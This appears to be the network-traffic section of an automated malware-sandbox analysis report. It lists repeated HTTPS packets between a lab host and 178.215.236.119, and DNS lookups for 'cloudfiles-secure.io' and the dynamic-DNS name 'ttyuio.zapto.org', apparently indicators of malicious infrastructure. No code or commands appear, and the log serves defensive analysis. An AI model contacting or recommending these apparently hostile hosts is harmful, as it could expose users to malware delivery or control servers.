                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.870646000 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.870990992 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871011019 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871056080 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871063948 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871090889 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871108055 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871542931 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871557951 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871599913 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871608019 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871637106 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.871656895 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872143030 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872159004 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872220993 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872229099 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872308969 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872656107 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872673035 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872735023 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872744083 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.872821093 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.956576109 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.956604004 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.956701994 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.956720114 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.956762075 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.957650900 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.957679987 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.957731009 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.957746029 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.957773924 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.957794905 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.958683968 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.958708048 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.958781958 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.958797932 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.958853960 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959191084 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959213972 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959291935 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959302902 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959433079 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959737062 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959759951 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959858894 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959868908 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.959938049 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.960254908 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.960285902 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.960447073 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.960463047 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.960645914 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.960949898 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.960972071 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.961044073 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.961052895 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.961257935 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.961435080 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.961460114 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.961523056 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.961534023 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:09.961592913 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055087090 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055120945 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055174112 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055190086 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055212975 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055232048 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055646896 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055682898 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055711985 CEST49739443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:10.055717945 CEST44349739178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.455073118 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.455430984 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.455451012 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.455521107 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.455535889 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.455800056 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.455996990 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.456012964 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.456068039 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.456080914 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.456217051 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.457421064 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.457437992 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.457515001 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.457529068 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.457578897 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.458077908 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.458096027 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.458163977 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.458174944 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.458215952 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.458235025 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.459018946 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.459036112 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.459084988 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.459104061 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.459108114 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.459119081 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.459160089 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.460091114 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.460107088 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.460194111 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.460210085 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.512458086 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546075106 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546103001 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546180010 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546200037 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546246052 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546287060 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546307087 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546343088 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546348095 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546375990 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546397924 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546866894 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546883106 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546921968 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546926975 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546957970 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.546978951 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548216105 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548249960 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548290014 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548295021 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548332930 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548707962 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548723936 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548768044 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548773050 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.548897982 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549211025 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549226046 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549290895 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549294949 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549343109 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549757004 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549772978 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549820900 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549825907 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.549874067 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.550343037 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.550359011 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.550395966 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.550400972 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.550430059 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.550455093 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.638345957 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.638389111 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.638462067 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.638487101 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.638504982 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.638533115 CEST49742443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:11.638820887 CEST44349742178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.124259949 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.124299049 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.124310970 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.124322891 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.124350071 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125051975 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125071049 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125121117 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125133038 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125215054 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125909090 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125925064 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125977993 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.125988960 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.126065969 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.201780081 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.201816082 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.201988935 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.202024937 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.203839064 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.209906101 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.209959030 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210036039 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210053921 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210088015 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210105896 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210529089 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210546970 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210606098 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210612059 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.210714102 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211049080 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211065054 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211123943 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211131096 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211239100 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211906910 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211922884 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211977959 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.211987972 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.212069988 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.212604046 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.212622881 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.212687016 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.212702036 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.212784052 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.213300943 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.213319063 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.213373899 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.213381052 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.213478088 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.214056969 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.214072943 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.214134932 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.214142084 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.214221954 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289282084 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289314985 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289364100 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289391994 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289407015 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289438963 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297559977 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297581911 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297676086 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297699928 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297897100 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297916889 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297957897 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297966003 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297983885 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298010111 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298446894 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298464060 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298522949 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298531055 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298701048 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298722029 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298727036 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298736095 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298765898 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298810005 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299253941 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299271107 CEST44349743178.215.236.119192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 06:22:51.301331043 CEST | 64353 | 53 | 192.168.2.5 | 1.1.1.1
Oct 2, 2024 06:22:51.390146017 CEST | 53 | 64353 | 1.1.1.1 | 192.168.2.5
Oct 2, 2024 06:23:16.533320904 CEST | 51542 | 53 | 192.168.2.5 | 1.1.1.1
Oct 2, 2024 06:23:16.542222023 CEST | 53 | 51542 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 06:22:51.301331043 CEST | 192.168.2.5 | 1.1.1.1 | 0xa9a4 | Standard query (0) | cloudfiles-secure.io | A (IP address) | IN (0x0001) | false
Oct 2, 2024 06:23:16.533320904 CEST | 192.168.2.5 | 1.1.1.1 | 0xcb4a | Standard query (0) | ttyuio.zapto.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 06:22:51.390146017 CEST | 1.1.1.1 | 192.168.2.5 | 0xa9a4 | No error (0) | cloudfiles-secure.io |  | 178.215.236.119 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 06:22:55.590727091 CEST | 1.1.1.1 | 192.168.2.5 | 0x2798 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 2, 2024 06:22:55.590727091 CEST | 1.1.1.1 | 192.168.2.5 | 0x2798 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
